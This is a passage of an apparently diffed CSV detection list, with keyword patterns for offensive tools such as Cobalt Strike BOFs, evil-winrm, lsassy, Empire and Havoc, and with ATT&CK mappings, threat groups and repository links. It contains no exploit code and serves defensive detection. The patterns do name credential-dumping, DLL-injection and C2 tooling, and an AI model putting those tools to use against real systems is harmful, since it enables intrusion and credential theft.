TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*dlink_telnet_backdoor_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dll* [HIJACKABLE]*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*dll\reflective_dll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","10","","N/A","","","" "*dll_generator.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*dll_hijack_detect_x64*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*dll_hijack_detect_x86*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*dll_hijack_hunter*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*DLL_Imports_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" -"*dll_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*dll_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*dll_spawn_cmd.cpp*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*DLL_TO_HIJACK_WIN10*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*DllCanUnloadNow*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*dllexploit.*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" -"*DllExport -*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*DLLHijackAuditKit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*DLLHijackAuditKit.zip*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*DllExport -*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*DLLHijackAuditKit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DLLHijackAuditKit.zip*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*DLL-Hijack-Search-Order-BOF*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*dllinject *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*dllinject.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*-DllInjection.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*dllKitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*DllLdr.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*dllinject.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*-DllInjection.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*dllKitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*DllLdr.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*dllload *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Dll-Loader -http -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*Dll-Loader -local -path*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*Dll-Loader -smb -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -http -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any 